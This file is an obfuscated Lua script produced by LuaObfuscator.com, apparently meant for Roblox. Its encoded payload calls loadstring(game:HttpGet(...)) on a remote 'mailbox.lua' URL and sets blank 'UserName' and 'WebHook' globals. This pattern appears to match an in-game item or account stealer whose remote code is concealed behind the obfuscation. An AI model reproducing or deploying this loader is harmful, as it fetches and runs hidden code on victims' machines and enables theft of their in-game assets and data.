--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(957 -(892 + 65)) -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(((7 -4) -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(1 -0)) -(v32-(1 -0))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + (368 -167)))) ;end end else local v85=(1620 -(87 + 263)) -(226 + 1044) ;local v86;while true do if (v85==(927 -(214 + 713))) then v86=(119 -(32 + 85))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=(715 -535) -(67 + 113) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 + 0 ;end end end local function v22()local v36=0;local v37;local v38;while true do if (v36==(952 -(802 + 150))) then v37,v38=v1(v16,v18,v18 + (5 -3) );v18=v18 + (3 -(1 + 0)) ;v36=1 + 0 ;end if (v36==(998 -(915 + 82))) then return (v38 * (724 -(614 -146))) + v37 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (1190 -(1069 + 118)) );v18=v18 + 4 ;return (v42 * (38062656 -21285440)) + (v41 * (143357 -(138272 -60451))) + (v40 * (45 + 211)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=(3 -2) + 0 ;local v46=(v20(v44,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(122 -90))) + v43 ;local v47=v20(v44,463 -((1477 -1061) + 26) ,98 -67 );local v48=((v20(v44,14 + (877 -(814 + 45)) )==(1 -0)) and  -(439 -(145 + 293))) or 1 ;if (v47==(430 -(44 + 386))) then if (v46==0) then return v48 * (1486 -(998 + 488)) ;else v47=1;v45=0 + 0 ;end elseif (v47==(1677 + 370)) then return ((v46==(772 -(201 + 571))) and (v48 * (1/(1138 -(116 + 1022))))) or (v48 * NaN) ;end return v8(v48,v47-(4258 -(7970 -4735)) ) * (v45 + (v46/((2 + 0)^52))) ;end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(2 + 1 + 0)) then return v6(v52);end if (v50==(886 -(261 + 624))) then v51=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;v50=1082 -(1020 + (206 -146)) ;end if (v50==(1425 -(630 + 793))) then v52={};for v91=1748 -(760 + 987) , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=9 -6 ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (3==v53) then v60=nil;v61=nil;v53=4;end if (v53~=(1276 -(388 + 886))) then else v58=nil;v59=nil;v53=3;end if (v53~=(1 -0)) then else v56=nil;v57=nil;v53=1 + 1 ;end if (v53==4) then while true do if (v54~=(1 + 2)) then else v61=nil;while true do local v99=1329 -(797 + 532) ;while true do if (v99==1) then if (v55==(560 -(306 + 254))) then local v121=0 + 0 ;local v122;while true do if (v121==(0 -0)) then v122=0 -0 ;while true do if (v122==(1467 -(899 + 568))) then local v167=1202 -(373 + 829) ;while true do if (v167~=(0 + 0)) then else v56={};v57={};v167=1131 -(369 + 761) ;end if (v167==(2 -1)) then v122=1;break;end end end if ((2 -0)==v122) then v55=604 -(268 + 335) ;break;end if (v122~=(1 -0)) then else v58={};v59={v56,v57,nil,v58};v122=2;end end break;end end end break;end if (v99~=(336 -(144 + 192))) then else if ((218 -(42 + 174))==v55) then local v123=572 -(426 + 146) ;local v124;while true do if (v123==0) then v124=0 + 0 ;while true do local v164=0 + 0 ;while true do if (v164==0) then if (0==v124) then for v170=1 + 0 ,v23() do local v171=1456 -(282 + 1174) ;local v172;local v173;local v174;while true do if (v171==(812 -(569 + 242))) then v174=nil;while true do if (v172~=(2 -1)) then else while true do if ((0 + 0)==v173) then v174=v21();if (v20(v174,1,1025 -(706 + 318) )==0) then local v186=0 -0 ;local v187;local v188;local v189;local v190;while true do if (v186~=(2 + 0)) then else while true do if (1==v187) then local v194=0;local v195;local v196;while true do if (v194~=(0 + 0)) then else v195=0;v196=nil;v194=1976 -(1913 + 62) ;end if (v194~=(1252 -(721 + 530))) then else while true do if (v195~=(0 + 0)) then else v196=1271 -(945 + 326) ;while true do if (v196==(0 -0)) then local v210=0;local v211;while true do if ((0 -0)==v210) then v211=0 + 0 ;while true do if (v211==(700 -(271 + 429))) then v190={v22(),v22(),nil,nil};if (v188==(1500 -(1408 + 92))) then local v212=0 -0 ;local v213;local v214;while true do if (v212~=(1087 -(461 + 625))) then else while true do if (v213==0) then v214=0;while true do if (v214~=(1288 -(993 + 295))) then else v190[1 + 2 ]=v22();v190[1175 -(418 + 753) ]=v22();break;end end break;end end break;end if (v212==(0 + 0)) then v213=0 + 0 ;v214=nil;v212=305 -(244 + 60) ;end end elseif (v188==(1 + 0)) then v190[1 + 2 ]=v23();elseif (v188==2) then v190[3]=v23() -((531 -(406 + 123))^16) ;elseif (v188~=(1772 -(1749 + 20))) then else local v217=476 -(41 + 435) ;while true do if (v217==(0 + 0)) then v190[3]=v23() -((1324 -(1249 + 73))^(6 + 10)) ;v190[4]=v22();break;end end end v211=1146 -(466 + 679) ;end if (v211==(1 + 0)) then v196=2 -1 ;break;end end break;end end end if (v196==1) then v187=1615 -(1565 + 48) ;break;end end break;end end break;end end end if (v187==(0 -0)) then local v197=1900 -(106 + 1794) ;local v198;while true do if (0==v197) then v198=0;while true do if (v198==(0 + 0)) then local v205=0;while true do if ((268 -(176 + 91))~=v205) then else v198=1 + 0 ;break;end if (v205~=(0 -0)) then else v188=v20(v174,5 -3 ,7 -4 );v189=v20(v174,118 -(4 + 110) ,590 -(57 + 527) );v205=3 -2 ;end end end if ((1428 -(41 + 1386))==v198) then v187=1;break;end end break;end end end if (3~=v187) then else if (v20(v189,10 -7 ,3)~=1) then else v190[4]=v61[v190[107 -(17 + 86) ]];end v56[v170]=v190;break;end if (v187~=(2 + 0)) then else local v200=0;while true do if (v200~=(0 -0)) then else local v204=0 -0 ;while true do if (v204~=(2 -1)) then else v200=167 -(122 + 44) ;break;end if ((0 -0)~=v204) then else if (v20(v189,1 -0 ,1)~=(2 -1)) then else v190[6 -4 ]=v61[v190[613 -(602 + 9) ]];end if (v20(v189,2 + 0 ,2)~=(873 -(826 + 46))) then else v190[1 + 2 ]=v61[v190[5 -2 ]];end v204=1;end end end if (v200~=(66 -(30 + 35))) then else v187=1 + 2 ;break;end end end end break;end if (v186~=(1899 -(260 + 1638))) then else local v192=0 + 0 ;while true do if (v192==1) then v186=1259 -(1043 + 214) ;break;end if (v192==0) then local v201=0 -0 ;while true do if (v201~=(1213 -(323 + 889))) then else v192=2 -1 ;break;end if (v201==0) then v189=nil;v190=nil;v201=581 -(361 + 219) ;end end end end end if (v186~=0) then else local v193=320 -(53 + 267) ;while true do if (v193~=(2 -1)) then else v186=1 + 0 ;break;end if (v193==0) then v187=413 -(15 + 398) ;v188=nil;v193=1;end end end end end break;end end break;end if ((0 -0)==v172) then local v179=982 -(18 + 964) ;while true do if ((3 -2)==v179) then v172=1;break;end if (v179==0) then v173=0 + 0 ;v174=nil;v179=1 + 0 ;end end end end break;end if (v171==0) then v172=0;v173=nil;v171=851 -(20 + 830) ;end end end for v175=1 + 0 ,v23() do v57[v175-1 ]=v28();end v124=1691 -(1121 + 569) ;end if (v124==(215 -(22 + 192))) then return v59;end break;end end end break;end end end if ((1 + 0)~=v55) then else local v125=1463 -(1404 + 59) ;local v126;while true do if (v125==0) then v126=126 -(116 + 10) ;while true do if (v126==(1 -0)) then local v168=765 -(468 + 297) ;local v169;while true do if (v168==(562 -(334 + 228))) then v169=0 -0 ;while true do if (v169~=(1 + 0)) then else v126=740 -(542 + 196) ;break;end if (v169~=(0 -0)) then else local v177=0 + 0 ;while true do if (v177==(1 + 0)) then v169=1 + 0 ;break;end if ((236 -(141 + 95))~=v177) then else for v180=1,v60 do local v181=0;local v182;local v183;while true do if (v181==(0 + 0)) then local v184=0;while true do if (v184==(1 + 0)) then v181=2 -1 ;break;end if (v184~=(0 -0)) then else local v191=1551 -(1126 + 425) ;while true do if (v191~=(406 -(118 + 287))) then else v184=3 -2 ;break;end if ((1121 -(118 + 1003))==v191) then v182=v21();v183=nil;v191=1;end end end end end if (v181==(2 -1)) then if (v182==(2 -1)) then v183=v21()~=(377 -(142 + 235)) ;elseif (v182==2) then v183=v24();elseif (v182==(13 -10)) then v183=v25();end v61[v180]=v183;break;end end end v59[3]=v21();v177=1 + 0 ;end end end end break;end end end if (v126~=(979 -(553 + 424))) then else v55=3 -1 ;break;end if (v126==(0 + 0)) then v60=v23();v61={};v126=1 + 0 ;end end break;end end end v99=1;end end end break;end if (v54~=(0 + 0)) then else v55=0 + 0 ;v56=nil;v54=1;end if (v54~=(1 -0)) then else local v97=0 + 0 ;while true do if (v97==0) then v57=nil;v58=nil;v97=766 -(574 + 191) ;end if (v97==(1 + 0)) then v54=2 + 0 ;break;end end end if (v54~=2) then else local v98=0;while true do if (v98==(2 -1)) then v54=6 -3 ;break;end if (v98~=0) then else local v100=0 -0 ;while true do if (v100~=(0 -0)) then else v59=nil;v60=nil;v100=1 + 0 ;end if (v100==1) then v98=127 -(55 + 71) ;break;end end end end end end break;end if (v53==0) then v54=0 -0 ;v55=nil;v53=4 -3 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then v78[v80[2]]();else v78[v80[2]]=v80[3];end elseif (v81<=2) then local v103=v80[2];local v104,v105=v71(v78[v103](v13(v78,v103 + 1 ,v80[3])));v73=(v105 + v103) -1 ;local v106=0;for v118=v103,v73 do v106=v106 + 1 ;v78[v118]=v104[v106];end elseif (v81==3) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=7) then if (v81<=5) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81==6) then do return;end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=8) then do return;end elseif (v81==9) then v72=v80[3];else v64[v80[3]]=v78[v80[2]];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v78[v80[2]]();else local v107=0;local v108;local v109;while true do if (v107==0) then v108=v80[2];v109=v78[v80[3]];v107=1;end if (v107==1) then v78[v108 + 1 ]=v109;v78[v108]=v109[v80[4]];break;end end end elseif (v81<=13) then local v110=v80[2];v78[v110]=v78[v110](v13(v78,v110 + 1 ,v73));elseif (v81>14) then local v134=0;local v135;local v136;while true do if (v134==1) then v78[v135 + 1 ]=v136;v78[v135]=v136[v80[4]];break;end if (v134==0) then v135=v80[2];v136=v78[v80[3]];v134=1;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=18) then if (v81<=16) then v78[v80[2]]=v80[3]~=0 ;elseif (v81>17) then v72=v80[3];else v64[v80[3]]=v78[v80[2]];end elseif (v81<=19) then local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==0) then v114=v80[2];v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v113=1;end if (v113==1) then v73=(v116 + v114) -1 ;v117=0;v113=2;end if (v113==2) then for v155=v114,v73 do local v156=0;while true do if (v156==0) then v117=v117 + 1 ;v78[v155]=v115[v117];break;end end end break;end end elseif (v81==20) then local v140=0;local v141;while true do if (v140==0) then v141=v80[2];v78[v141]=v78[v141](v13(v78,v141 + 1 ,v73));break;end end else v78[v80[2]]=v80[3];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030A3O00557365436F646542595303073O00576562482O6F6B035O00153O00124O00013O0026033O000C000100020004093O000C0001001205000100033O001205000200043O00200F00020002000500122O000400064O0010000500014O0002000200054O001400013O00022O00010001000100010004093O001400010026033O0001000100010004093O0001000100122O000100083O001211000100073O00122O0001000A3O001211000100093O00124O00023O0004093O000100012O00063O00017O00",v9(),...);
